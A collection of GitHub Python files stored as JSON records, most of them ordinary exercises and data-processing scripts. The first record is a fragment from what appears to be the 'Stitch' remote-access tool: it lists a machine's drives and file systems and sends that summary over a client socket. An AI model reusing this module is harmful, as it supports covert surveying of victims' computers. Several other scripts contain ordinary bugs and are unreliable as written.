DRIVE_NO_ROOT_DIR : 'DRIVE_NO_ROOT_DIR',\n DRIVE_REMOVABLE : 'DRIVE_REMOVABLE',\n DRIVE_FIXED : 'DRIVE_FIXED',\n DRIVE_REMOTE : 'DRIVE_REMOTE',\n DRIVE_CDROM : 'DRIVE_CDROM',\n DRIVE_RAMDISK : 'DRIVE_RAMDISK'}\n\nkernel32 = ctypes.windll.kernel32\nvolumeNameBuffer = ctypes.create_unicode_buffer(1024)\nfileSystemNameBuffer = ctypes.create_unicode_buffer(1024)\ndrives = []\nbitmask = kernel32.GetLogicalDrives()\nletter = ord('A')\nwhile bitmask > 0:\n if bitmask & 1:\n drives.append(chr(letter) + ':\\\\')\n bitmask >>= 1\n letter += 1\nserial_number = None\nmax_component_length = None\nfile_system_flags = None\n\nsummary = ''\nfor d in drives:\n drive_type = kernel32.GetDriveTypeA('%s\\\\' % d)\n rc = kernel32.GetVolumeInformationW(\n ctypes.c_wchar_p(d),\n volumeNameBuffer,\n ctypes.sizeof(volumeNameBuffer),\n serial_number,\n max_component_length,\n file_system_flags,\n fileSystemNameBuffer,\n ctypes.sizeof(fileSystemNameBuffer)\n )\n summary += d\n summary += '\\n===='\n summary += \"\\nFile Type\\t:{}\".format(fileSystemNameBuffer.value)\n summary += \"\\nDrive Type\\t:{}\\n\\n\".format(DRIVE_TYPE_MAP[drive_type])\nsend(client_socket, summary)\n","repo_name":"nathanlopez/Stitch","sub_path":"PyLib/drive_finder.py","file_name":"drive_finder.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":2766,"dataset":"github-code","pt":"32"} +{"seq_id":"17922114930","text":"name=[\"n\",\"i\",\"t\",\"i\",\"n\"]\ni=-1\na=[]\nwhile i>=(-len(name)):\n a.append(name[i])\n i=i-1\nif a==name:\n print(\"palindrome no\")\nelse:\n print(\"not a palindrome no\")","repo_name":"trupti096/List-","sub_path":"palindrome or not.py","file_name":"palindrome or not.py","file_ext":"py","file_size_in_byte":169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11748949505","text":"#!/usr/bin/python3\n\"\"\"module for '8-rectangle.py'\n\"\"\"\n\n\nBaseGeometry = __import__('7-base_geometry').BaseGeometry\n\n\nclass Rectangle(BaseGeometry):\n \"\"\"subclass that inherit from BaseGeometry\n A representation of a retangle\n \"\"\"\n def __init__(self, width, height):\n \"\"\"instantiate Rectangle\"\"\"\n self.integer_validator(\"width\", width)\n self.__width = width\n self.integer_validator(\"height\", height)\n self.__height = height\n","repo_name":"Torbary/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/8-rectangle.py","file_name":"8-rectangle.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25859247672","text":"\"\"\"\nUnit Test cases for model.py file\n\"\"\"\nimport pytest\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport src.modelbuilding.model as M\nimport pandas as pd\nimport os\nfrom src.modelbuilding.model import ModelBuilding\ndef test_split(mocker):\n mocker.patch(\"src.modelbuilding.model.ModelBuilding.train\", return_value=None)\n mocker.patch(\"src.modelbuilding.model.ModelBuilding.predict\", return_value=None)\n df = pd.read_csv(\"https://raw.githubusercontent.com/ritik8801/Diabetes-Detection-Web-Application/main/Testing/tests/unit_tests/test_data/sample.csv\")\n m = ModelBuilding(df, path=\"test_data\")\n assert isinstance(m.X_train, pd.DataFrame)\n assert isinstance(m.X_test, pd.DataFrame)\n assert isinstance(m.y_train, pd.Series)\n assert isinstance(m.y_test, pd.Series)\n\n@pytest.fixture()\ndef sample_split(mocker):\n data = pd.read_csv(\"https://raw.githubusercontent.com/ritik8801/Diabetes-Detection-Web-Application/main/Testing/tests/unit_tests/test_data/sample.csv\")\n X = data[['Pregnancies', 'Glucose', 'BloodPressure',\n 'SkinThickness', 'Insulin',\n 'BMI', 'DiabetesPedigreeFunction', 'Age']]\n y = data['Outcome']\n X_train, X_test, y_train, y_test = train_test_split(X, y,\n test_size=0.2)\n return X_train, X_test, y_train, y_test\n\ndef test_train(mocker, sample_split):\n mocker.patch(\"src.modelbuilding.model.ModelBuilding.split\", return_value=None)\n mocker.patch(\"src.modelbuilding.model.ModelBuilding.predict\", return_value=None)\n df = pd.read_csv(\"https://raw.githubusercontent.com/ritik8801/Diabetes-Detection-Web-Application/main/Testing/tests/unit_tests/test_data/sample.csv\")\n print(\"sample split\")\n print(sample_split[0])\n m = ModelBuilding(df, X_train= sample_split[0], X_test=sample_split[1],\n y_train=sample_split[2], y_test=sample_split[3], path=\"test_data\")\n assert m.rcb is not None\n","repo_name":"ritik8801/Diabetes-Detection-Web-Application","sub_path":"Testing/tests/unit_tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12958005069","text":"from typing import List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\nclass Person(BaseModel):\n id: int\n name: str\n age:int \n\nDB: List[Person] = [\n Person(id=1, name=\"Jamilah\", age=22),\n Person(id=2, name=\"Alex\", age=19),\n Person(id=3, name=\"Ali\", age=15)\n]\n\n@app.get(\"/api\")\ndef read_root():\n return DB\n\n\n# @app.get(\"/items/{item_id}\")\n# def read_item(item_id: int, q: Union[str, None] = None):\n# return {\"item_id\": item_id, \"q\": q}\n\n\n####\n## Venv\n####\n# Create Virtual Environment >python3 -m venv .venv\n# Activate Virtual Environment >source .venv/bin/activate\n# Install a package into the Env >python3 -m pip install openpyxl\n# De-activate Virtual Environment >deactivate\n\n# to start frontend (cd frontend) >npm start\n# to start backend >uvicorn main:app --reload\n\n","repo_name":"jnuo/pyReact","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28267943612","text":"import sys\nsys.path.insert(0,'..')\nfrom _setup import *\n\nfrom datetime import datetime\n\n# import csv\n# from scipy.io import loadmat\nimport numpy as np\nfrom pandas import read_csv, to_datetime\n\nfrom netCDF4 import Dataset, date2num\nfrom OceanPy.netcdf import createNetCDF\n\n# LOAD DATA\ninput_file = os.path.join(datadir, 'processed', 'ss9802', 'trawler', 'ctd', 'O&A_SS199802_ctd_trawler.csv')\noutput_file = os.path.join(datadir, 'processed', 'ss9802', 'ctd', 'ss9802_ctd.nc')\n\nif not os.path.exists(os.path.dirname(output_file)):\n os.makedirs(os.path.dirname(output_file))\n\nif os.path.isfile(input_file):\n\n if os.path.isfile(output_file):\n nc = Dataset(output_file, 'r')\n\n print('Output file %s already exists, including variables %s.'\n % (os.path.split(output_file)[-1], ', '.join(list(nc.variables))))\n\n else:\n # make directories to store output file\n if not os.path.exists(os.path.dirname(output_file)):\n os.makedirs(os.path.dirname(output_file))\n\n # READ DATA IN DATAFRAME\n df = read_csv(input_file)\n df = df.drop(['SURVEY_NAME', 'PROJECT_NAME', 'MARLIN_ID', 'MARLIN_UUID',\n 'OXYGEN_QC', 'SALINITY_QC', 'TEMPERATURE_QC'], axis=1)\n\n # REFORMAT DATA\n df['START_TIME'] = df['START_TIME'].apply(lambda t: datetime.strptime(t, '%Y-%m-%d %H:%M:%S'))\n df['END_TIME'] = df['END_TIME'].apply(lambda t: datetime.strptime(t, '%Y-%m-%d %H:%M:%S'))\n\n # MAKE LIST OF PRESSURE LEVELS\n dp = 2\n p_levels = np.linspace(df['PRESSURE'].min(), df['PRESSURE'].max(),\n int((df['PRESSURE'].max() - df['PRESSURE'].min()) / dp + 1))\n\n # (1) Store all measurements in one vector/list\n\n # (2) Store each variable in array of stations and pressure levels\n\n # # INDEX OF FIRST OBSERVATION AT EACH STATION + INDEX OF VERY LAST OBSERVATION\n idx = [0] + [i + 1 for i in range(len(df) - 1) if df.loc[i, 'STATION'] != df.loc[i + 1, 'STATION']]\n\n # DEFINE ARRAY WITH SHAPE (STATIONS, PRESSURE LEVELS)\n npmax = len(p_levels)\n nsmax = df['STATION'].max()\n\n maskarr = np.ma.masked_all((nsmax, npmax))\n temperature, salinity, oxygen = maskarr.copy(), maskarr.copy(), maskarr.copy()\n\n for ist, station in enumerate(df['STATION'].unique()):\n nobs = len(df.loc[df['STATION'] == station])\n temperature[ist, 0:nobs] = df['TEMPERATURE'].loc[df['STATION'] == station].values\n salinity[ist, 0:nobs] = df['SALINITY'].loc[df['STATION'] == station].values\n oxygen[ist, 0:nobs] = df['OXYGEN'].loc[df['STATION'] == station].values\n\n # for i in range(0, nsmax):\n # temperature[i, 0:idx[i + 1] - idx[i]] = df['TEMPERATURE'].iloc[idx[i]:idx[i + 1]].values\n # salinity[i, 0:idx[i + 1] - idx[i]] = df['SALINITY'].iloc[idx[i]:idx[i + 1]].values\n # oxygen[i, 0:idx[i + 1] - idx[i]] = df['OXYGEN'].iloc[idx[i]:idx[i + 1]].values\n\n # (3) Store each variable in array of stations in transect, transect number and pressure levels\n\n # TRANSECT INFORMATION\n transects = {1: list(range(3, 11)), 2: list(reversed(range(11, 19))), 3: list(range(19, 28)),\n 4: list(reversed(range(27, 35))), 5: list(range(37, 47)), 6: list(reversed(range(47, 58))),\n 7: list(range(57, 66)), 8: list(range(69, 77)), 9: list(reversed(range(77, 85))),\n 10: list(range(85, 92)), 11: list(reversed([94, 93] + list(range(95, 102))))}\n\n ntsmax = len(transects)\n nstmax = len(max(transects.items(), key=lambda x: len(x[1]))[1])\n\n maskarr = np.ma.masked_all((ntsmax, nstmax, npmax))\n temperature_ts, salinity_ts, oxygen_ts = maskarr.copy(), maskarr.copy(), maskarr.copy()\n for its, transect in enumerate(transects.keys()):\n for ipf, profile in enumerate(transects[transect]):\n temperature_ts[its, ipf,] = temperature[profile - 1]\n salinity_ts[its, ipf,] = salinity[profile - 1]\n oxygen_ts[its, ipf,] = oxygen[profile - 1]\n\n # WRITE DATA TO NETCDF\n # define dimensions of lists/ arrays\n dim = {\n 'time': len(df['START_TIME']), # maximum timestamps\n 'profile': df['STATION'].max(), # maximum profiles\n 'start_end': 2, # start/ end of profile\n 'plevel': npmax, # maximum pressure levels\n 'transect': ntsmax, # maximum transects\n 'profile_ts': nstmax # maximum profiles per transect\n }\n\n # define global attributes to save in NetCDF\n glob_attr = {\n 'title': 'Sub Antarctic Front Dynamics Experiment (SAFDE) 1997-1998',\n 'creator_name': 'Jan Jaap Meijer'\n }\n\n # define variable datatype, dimensions and data\n # try to use standard name as var_name as specified here:\n # http://cfconventions.org/Data/cf-standard-names/current/build/cf-standard-name-table.html\n\n # TODO: use function date2num and num2date from netCDF4 to convert datetime64 to datetime\n # https://stackoverflow.com/questions/39997314/write-times-in-netcdf-file\n # http://www.ceda.ac.uk/static/media/uploads/ncas-reading-2015/11_create_netcdf_python.pdf\n\n times = np.stack((to_datetime(list(df['START_TIME'][idx])).to_pydatetime(),\n to_datetime(list(df['END_TIME'][idx])).to_pydatetime()), axis=-1)\n \n \n vars = {\n 'station':\n ('station', 'i4', ('profile',), df['STATION'][idx].values),\n 'time':\n ('time', 'f8', ('profile', 'start_end',), times),\n 'lon':\n ('longitude', 'f8', ('profile', 'start_end',),\n np.stack((df['START_LON'][idx], df['END_LON'][idx]), axis=-1)),\n 'lat':\n ('latitude', 'f8', ('profile', 'start_end',),\n np.stack((df['START_LAT'][idx], df['END_LAT'][idx]), axis=-1)),\n 'bot_lon':\n ('bottom longitude', 'f8', ('profile',), df['BOTTOM_LON'][idx].values),\n 'bot_lat':\n ('bottom latitude', 'f8', ('profile',), df['BOTTOM_LAT'][idx].values),\n 'depth':\n ('depth', 'f8', ('profile',), df['BOTTOM_DEPTH'][idx].values),\n 'p':\n ('sea_water_pressure', 'f8', ('plevel',), p_levels),\n 't':\n ('sea_water_temperature', 'f8', ('profile', 'plevel',), temperature),\n 'SP':\n ('sea_water_practical_salinity', 'f8', ('profile', 'plevel',), salinity),\n 'O2':\n ('mole_concentration_of_dissolved_molecular_oxygen_in_sea_water', 'f8', ('profile', 'plevel',),\n oxygen),\n 'ts_t':\n ('transect sea_water_temperature', 'f8', ('transect', 'profile_ts', 'plevel',), temperature_ts),\n 'ts_SP':\n ('transect sea_water_practical_salinity', 'f8', ('transect', 'profile_ts', 'plevel',), salinity_ts),\n 'ts_O2':\n ('transect mole_concentration_of_dissolved_molecular_oxygen_in_sea_water', 'f8',\n ('transect', 'profile_ts', 'plevel',), oxygen_ts),\n }\n\n # save data in netcdf file using OceanPy's createNetCDF class\n nc = createNetCDF(output_file)\n nc.add_dims(dim)\n nc.add_glob_attr(glob_attr)\n nc.create_vars(vars)\n nc.close()\n\n print('Output file %s created and CSV variables stored in NetCDF file as %s.'\n % (os.path.split(output_file)[-1], ', '.join(vars.keys())))\n\nelse:\n print('Input file %s does not exist, download csv file from trawler' % os.path.split(input_file)[-1])\n\n\n\n\n\n# test = Dataset(output_file, 'r')\n# import matplotlib.pyplot as plt\n# fig, ax = plt.subplots()\n# cf = ax.contourf(test['temperature_ts'][0,].T)\n# ax.invert_yaxis()\n# plt.colorbar(cf)","repo_name":"janjaapmeijer/phd-public","sub_path":"src/ss9802/00_data/ctd_csv2nc.py","file_name":"ctd_csv2nc.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41387073783","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 14 13:56:42 2018\n\n@author: fatemeh\n\"\"\"\nimport tensorflow as tf\nclass main_network:\n\n def __init__(self, n_featurs,n_h=[100,200],n_layers=2,n_class=1):\n self.n_input=n_featurs\n self.n_h = n_h\n self.n_layers = n_layers \n self.n_class = n_class \n \n self.X = tf.placeholder(\"float\", [None, n_featurs]) # fo each patients at each time step\n self.Y = tf.placeholder(\"float\", [None, 1]) # for each state of each patients at each time step\n\n def construct_back_bone_nn(self):\n weights = []\n biase = []\n # constructing first layer\n l1_weights = tf.Variable(tf.random_normal([self.n_input, self.n_h[0]])) # fully connected neural networks \n l1_bias=tf.Variable(tf.random_normal([self.n_h[0]]))\n \n weights.append(l1_weights)\n biase.append(l1_bias)\n \n layer_no =0 \n while (layers_no < self.n_layers-1) :\n l_weights = tf.Variable(tf.random_normal([self.n_h[layers_no], self.n_h[layers_no+1]]))\n l_bias=tf.Variable(tf.random_normal([n_h[layers_no+1]]))\n weights.append(l_weights)\n biase.append(l_bias)\n layers_no +=1\n \n \n ## constructing out putlayer\n l_weights = tf.Variable(tf.random_normal([self.n_h[layers_no], self.n_class]))\n l_bias=tf.Variable(tf.random_normal([self.n_class]))\n biase.append(l_bias)\n weights.append(l_weights)\n \n return self\n \n \n # simple neural network with out aouto encoder\n def feed_forward_neural_net(self):\n out_layer = tf.nn.sigmoid(tf.add(tf.matmul(self.X, weights[0]),biases[0]))\n layers_no =1 \n while layer_no< self.n_layers :\n out_layer = tf.nn.sigmoid(tf.add(tf.matmul(out_layer,weights[layer_no]),biases[layer_no]))\n layers_no +=1 \n \n \n return out_layer\n ","repo_name":"fatemeh91/SMART-FHIR-Application","sub_path":"F_Sepsis/Debugged/F_Sepsis/main_network.py","file_name":"main_network.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15384514190","text":"import xlrd\r\nimport win32ui\r\nimport sys\r\nimport re\r\nimport os\r\n\r\nrow_list = ['sig_name','msg_name','start_bit','sig_len','val_range','unit','formula','sta_value']\r\ncontent_title = ['Tbox统一信号名称','报文名称','信号起始位','信号长度(bit)','物理值范围','单位','计算公式','车厂状态类信号']\r\nid_title = ['报文名称','报文id','报文周期(ms)','报文长度','信号格式']\r\n\r\nsig_len = 8\r\nscale = ''\r\nsig_value = ''\r\nbo_list = []\r\n\r\ndef idToInt(id):\r\n intId = int(id,16)\r\n return intId\r\n\r\ndef sig_value_split(x):\r\n sig_value = ''\r\n if x != '':\r\n list_sig = str(x).strip().split('\\n')\r\n for value in list_sig:\r\n if '##' in value:\r\n list_value = re.split('\\W+',value)\r\n sig_value = sig_value + str(int(list_value[0].strip(),16))+' \"' + list_value[1] + '\" '\r\n else:pass\r\n\r\n\r\ndef formula_split(x):\r\n factor = ''\r\n offset = ''\r\n x = str(x).upper().strip()\r\n if x == '':\r\n x = 'X'\r\n elif 'X' not in x:\r\n print('shuru cuowu 的')\r\n else:\r\n if '*X' in x:\r\n factor = x.split('*X')[0]\r\n offset = x.split('*X')[1]\r\n if offset =='':\r\n offset = '0'\r\n elif '+' in offset:\r\n offset = offset.strip('+')\r\n else:\r\n pass\r\n else:\r\n factor = '1'\r\n offset = x.split('X')[1]\r\n if offset == '':\r\n offset = '0'\r\n elif '+' in offset:\r\n offset = offset.strip('+')\r\n else:\r\n pass\r\n return (factor,offset)\r\n\r\ndef scale_split(x):\r\n scale_min = 0\r\n scale_max = 0\r\n (factor,offset) = formula_split(scale)\r\n if factor ==''or offset == '':\r\n factor = 1\r\n offset = 0\r\n else:\r\n pass\r\n if x == '':\r\n scale_min = offset\r\n scale_max = factor * (2**sig_len) + offset\r\n else:\r\n scale_min = x.split('~')[0]\r\n scale_max = x.split('~')[1]\r\n return [scale_min,scale_max]\r\n\r\ndef openExecl(path):\r\n title_num = 0\r\n data = xlrd.open_workbook(path)\r\n table = data.sheet_by_index(0)\r\n n_rows = table.nrows\r\n n_cols = table.ncols\r\n sig_info = []\r\n id_info = []\r\n sig_cols = []\r\n id_cols = []\r\n name_to_id = {}\r\n id_info_row = 0\r\n base_path = os.path.dirname(path)\r\n print(base_path)\r\n new_dbc = base_path + '\\\\result\\\\'+ 'dbc_result'+'.dbc'\r\n dbc_pre1 = base_path + '\\\\pre_dbc\\\\'+ 'dbc_pre1'+'.txt'\r\n dbc_pre2 = base_path + '\\\\pre_dbc\\\\' + 'dbc_pre2' + '.txt'\r\n open_pre1 = open(dbc_pre1, 'r')\r\n open_pre2 = open(dbc_pre2, 'r')\r\n new_file = open(new_dbc,'w',encoding='utf-8')\r\n new_file.write(open_pre1.read()+'\\n')\r\n new_file.write('\\n'* 3)\r\n\r\n for i in range(0,n_rows):\r\n sig_len = table.row_values(i)[7]\r\n scale = table.row_values(i)[8]\r\n sig_value = table.row_values(i)[13]\r\n if table.row_values(i)[5] == '报文名称':\r\n sig_info_row = i\r\n for j in range(0,table.ncols):\r\n if table.row_values(i)[j] in content_title:\r\n sig_cols.append(j)\r\n elif id_info_row == 0 and table.row_values(i)[2] == 'YES':\r\n temp_sig = []\r\n for index in sig_cols:\r\n s = table.row_values(i)[index]\r\n if type(s) == float:\r\n s = str(int(table.row_values(i)[index]))\r\n temp_sig.append(s)\r\n sig_info.append(temp_sig) ##sig_info 为所有信号信息集合\r\n elif table.row_values(i)[0] == '报文名称':\r\n id_info_row = i\r\n for j in range(0,n_cols):\r\n if table.row_values(i)[j] in id_title:\r\n id_cols.append(j)\r\n for j in range(i+1,n_rows):\r\n type_order = 0\r\n tem_id = []\r\n name_to_id[table.row_values(j)[0]] = table.row_values(j)[1]\r\n for index in id_cols:\r\n temp = table.row_values(j)[index]\r\n if type(temp) == float:\r\n temp = str(int(temp))\r\n tem_id.append(temp)\r\n bo = 'BO_ '+ str(idToInt(tem_id[1])) + ' '+ tem_id[0] + ': ' + str(tem_id[3]) + ' Vector__XXX'\r\n new_file.write(bo+'\\n')\r\n for temp_sig in sig_info:\r\n if tem_id[4] == 'intel':\r\n type_order = 1\r\n else:type_order = 0\r\n if temp_sig[1] == tem_id[0]:\r\n (factor, offset) = formula_split(temp_sig[6])\r\n [min_value,max_value] = scale_split(temp_sig[4])\r\n sg = ' SG_ ' + temp_sig[0] + ' : ' + temp_sig[2] +'|'+ temp_sig[3] + '@'+ str(type_order) + '+' + ' (' + factor + ',' + offset + ') '+ '[' + min_value + '|'+ max_value + '] '+'\"'+temp_sig[5]+'\"'+' Vector__XXX'\r\n new_file.write(sg+'\\n')\r\n new_file.write( '\\n')\r\n id_info.append(tem_id)\r\n # id_info[table.row_values(j)[0]] = tem_id\r\n bo_list.append(bo)\r\n new_file.write('\\n' * 3)\r\n new_file.write(open_pre2.read() + '\\n'*2)\r\n for value in id_info:\r\n id = str(idToInt(value[1]))\r\n cycle_time = 'BA_ \"GenMsgCycleTime\" BO_ ' + id + ' ' + value[2] + ';'\r\n send_type = 'BA_ \"GenMsgSendType\" BO_ ' + id + ' 0;'\r\n frame_format = 'BA_ \"VFrameFormat\" BO_ ' + id + ' 3;'\r\n new_file.write(cycle_time + '\\n' + send_type + '\\n' + frame_format + '\\n')\r\n for msg_value in sig_info:\r\n if msg_value[7] != '':\r\n temp_msg = str(msg_value[7]).split('\\n')\r\n write_line = ''\r\n for detail_msg in temp_msg :\r\n index_id = re.split('\\W+',detail_msg,1)[0]\r\n index_id = str(index_id)\r\n index_id = int(index_id,16)\r\n content = re.split('\\W+',detail_msg,1)[1]\r\n write_line = write_line + ' ' + str(index_id) + ' \"' + content + '\"'\r\n new_file.write('VAL_ ' + str(idToInt(name_to_id[msg_value[1]])) + ' ' + msg_value[0] + write_line + ';')\r\n new_file.write('\\n')\r\n ## temp_id = (table.row_values(j)[id_cols[0]],table.row_values(j)[id_cols[1]],table.row_values(j)[id_cols[2]],table.row_values(j)[id_cols[3]],table.row_values(j)[id_cols[4]])\r\n\r\n# dlg = win32ui.CreateFileDialog(1)\r\n# dlg.SetOFNInitialDir('C:\\1work\\T-box\\Tools\\dbc生成工具')\r\n# dlg.DoModal()\r\n#\r\n# filename = dlg.GetPathName()\r\nopenExecl(u'C:\\\\1work\\T-box\\A_TBOX_file\\huxiaoshuang\\dbc_generate\\江西玖发纯电动汽车_GB_协议对接表_V1.1.xlsx')","repo_name":"hhxxss0722/double","sub_path":"dbcCreat/getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":6711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27699277612","text":"from selenium.webdriver.common.by import By\nfrom projetin_xerox.programa.busca_elemento import retorna_elemento_indice, retorna_text_indice\n\ndef maquina_4620(driver):\n driver.refresh()\n freme = retorna_elemento_indice(driver, (By.TAG_NAME,'frame'), indice=1)\n driver.switch_to.frame(freme)\n a = driver.find_elements(By.TAG_NAME,'a')\n for c in a:\n if c.text == 'Consumables':\n c.click()\n break\n driver.refresh()\n freme = retorna_elemento_indice(driver, (By.TAG_NAME,'frame'), indice=-1)\n driver.switch_to.frame(freme)\n toner = retorna_text_indice(driver, locator=(By.CLASS_NAME, 'centeredTextDescriptor'), indice=1)\n cilindro = retorna_text_indice(driver, locator=(By.CLASS_NAME, 'centeredTextDescriptor'), indice=3)\n return [toner, cilindro]","repo_name":"Luiznuness/Projeto-xerox","sub_path":"projetin_xerox/maquinas/maquina_4620.py","file_name":"maquina_4620.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72478909850","text":"#coding:utf-8\n\nimport json\nimport numpy as np\nfrom conf.config import args, deleted_labels, map_labels\nimport torch as t\nfrom torch.utils.data import Dataset\nfrom transformers import BertTokenizer, BertTokenizerFast\n\nMAX_LEN = args.max_length\n\ndef is_in(real_loc, loc):\n if real_loc >= loc[0] and real_loc < loc[1]:\n return True\n return False\n\ndef parse_json_data(file_path, tokenizer):\n input_ids_a = []\n attention_mask_a = []\n label_ids_a = []\n labels_a = []\n total_label_list = []\n with open(file_path) as f:\n for line in f:\n info = json.loads(line.strip())\n text = info['text']\n label_dict= info['label']\n loc_label_dict = {}\n for label, entity_dict in label_dict.items():\n if label in deleted_labels:\n continue\n elif label in map_labels:\n label = map_labels[label]\n if label not in total_label_list:\n total_label_list.append(label) \n for entity, loc_list in entity_dict.items():\n for loc in loc_list:\n loc_label_dict[tuple(loc)] = label\n tokens = tokenizer(list(text),is_split_into_words=True, max_length=MAX_LEN, padding='max_length',\n truncation=True)\n input_ids = tokens['input_ids']\n attention_mask = tokens['attention_mask']\n word_ids = tokens.word_ids()\n labels = ['O'] * MAX_LEN\n label_ids = [0] * MAX_LEN\n for idx, item in enumerate(labels):\n real_loc = word_ids[idx]\n if real_loc is None:\n continue\n for loc,key in loc_label_dict.items():\n if is_in(real_loc, loc):\n if real_loc == loc[0]:\n labels[idx] = 'B-' + key\n else:\n labels[idx] = 'I-' + key\n break\n input_ids_a.append(input_ids)\n attention_mask_a.append(attention_mask)\n labels_a.append(labels)\n #label_ids_a.append(label_ids)\n real_label_dict = {'O':0}\n index = 1\n for key in total_label_list:\n real_label_dict['B-' + key] = index\n index += 1\n real_label_dict['I-' + key] = index\n index += 1\n return (input_ids_a, attention_mask_a, labels_a), real_label_dict\n\nclass NERDataset(Dataset):\n def __init__(self, label_2_ids, input_ids, attention_mask, labels):\n self.label_2_ids = label_2_ids\n self.input_ids = input_ids\n self.attention_mask = attention_mask\n self.labels = labels\n\n def __len__(self):\n return len(self.input_ids)\n\n def __getitem__(self, idx):\n token_ids = self.input_ids[idx]\n att_mask = self.attention_mask[idx]\n new_labels = self.labels[idx]\n label_ids = [0] * MAX_LEN\n for idx, label in enumerate(new_labels):\n if label == 'O':\n label_ids[idx] = self.label_2_ids[label]\n else:\n if new_labels[idx] != new_labels[idx-1]:\n label_ids[idx] = self.label_2_ids[label]\n else:\n label_ids[idx] = self.label_2_ids[label]\n \n return t.tensor(token_ids, dtype=t.long), t.tensor(att_mask, dtype=t.long), \\\n t.tensor(label_ids, dtype=t.long)\n\nclass NERDatasetSplit(Dataset):\n def __init__(self, label_2_ids, idx_list, input_ids, attention_mask, labels):\n self.label_2_ids = label_2_ids\n self.input_ids = np.array(input_ids)[idx_list]\n self.attention_mask = np.array(attention_mask)[idx_list]\n self.labels = np.array(labels)[idx_list]\n\n def __len__(self):\n return len(self.input_ids)\n\n def __getitem__(self, idx):\n token_ids = self.input_ids[idx]\n att_mask = self.attention_mask[idx]\n new_labels = self.labels[idx]\n label_ids = [0] * MAX_LEN\n for idx, label in enumerate(new_labels):\n if label == 'O':\n label_ids[idx] = self.label_2_ids[label]\n else:\n if new_labels[idx] != new_labels[idx-1]:\n label_ids[idx] = self.label_2_ids[label]\n else:\n label_ids[idx] = self.label_2_ids[label]\n \n return t.tensor(token_ids, dtype=t.long), t.tensor(att_mask, dtype=t.long), \\\n t.tensor(label_ids, dtype=t.long)\n\nif __name__ == '__main__':\n file_path = args.train_file\n tokenizer = BertTokenizerFast.from_pretrained('./resource/base_models/base_albert', do_lower_case=True)\n q, real_label_dict = parse_json_data(file_path, tokenizer)\n print(input_ids[0])\n","repo_name":"Chtholly1/Bert_NER","sub_path":"business/data_process/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17904083943","text":"\"\"\"\nThis model contains both Categorical and Numerical Features.\nPreprocessing is done by Tensorflow functions itself and then values are passed onto the model.\n\"\"\"\nimport tensorflow as tf\nimport shutil\nimport six\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\nCOLUMNS = []\nLABEL = ''\nDEFAULTS = [[0], [''], [''], [''], [''], [''], [''], [''], [0.0]]\nTO_REMOVE = ''\n\ndef init(hparams):\n global COLUMNS, LABEL, DEFAULTS, TO_REMOVE\n COLUMNS = ['Unnamed: 0', 'day_period', 'day_of_week', 'zip_encode', 'location_encode',\n 'community_encode', 'agency_encode', 'complaint_encode', 'TimeTaken']\n\n LABEL = 'TimeTaken'\n TO_REMOVE = 'Unnamed: 0'\n\n DEFAULTS = [[0], [''], [''], [''], [''], [''], [''], [''], [0.0]]\n\ndef read_dataset(filename, mode, batch_size):\n def _input_fn():\n \n def _decode_csv(line):\n \"\"\"Takes the string input tensor and returns a dict of rank-2 tensors.\"\"\"\n columns = tf.decode_csv(line, record_defaults=DEFAULTS)\n features = dict(zip(COLUMNS, columns))\n\n # Remove unused columns.\n features.pop(TO_REMOVE)\n\n for key, _ in six.iteritems(features):\n if(key != 'TimeTaken'):\n features[key] = tf.expand_dims(features[key], -1)\n else:\n features[key] = tf.expand_dims(tf.cast(features[key], tf.float64), -1)\n return features\n\n # create file path\n #file_path = 'gs://nyc_servicerequest/processedInput/train*'\n file_path = filename\n \n\n # Create list of files that match pattern (we are currently not using a pattern\n # such as 1-of-15)\n file_list = tf.gfile.Glob(file_path)\n\n # Create dataset from file list\n dataset = tf.data.TextLineDataset(file_list).map(_decode_csv)\n \n if mode == tf.estimator.ModeKeys.TRAIN:\n num_epochs = None # indefinitely\n dataset = dataset.shuffle(buffer_size=batch_size * 10)\n else:\n num_epochs = 1\n \n iterator = dataset.repeat(num_epochs).batch(batch_size).make_one_shot_iterator()\n features = iterator.get_next()\n return features, features.pop(LABEL)\n\n \"\"\"dataset = (tf.data.TextLineDataset(file_list) # Read text file\n .skip(1) \n .map(decode_csv)) # Transform each elem by applying decode_csv fn\n \n if mode == tf.estimator.ModeKeys.TRAIN:\n num_epochs = None # indefinitely\n dataset = dataset.shuffle(buffer_size = 10 * batch_size)\n else:\n num_epochs = 1 # end-of-input after this\n \n iterator = dataset.repeat(num_epochs).batch(batch_size).make_one_shot_iterator()\n features = iterator.get_next()\n return features, features.pop(LABEL)\n \"\"\"\n return _input_fn\n\n \ndef serving_input_fn():\n feature_placeholders = {\n 'day_period': tf.placeholder(tf.string, [None]),\n 'day_of_week': tf.placeholder(tf.string, [None]),\n 'zip_encode': 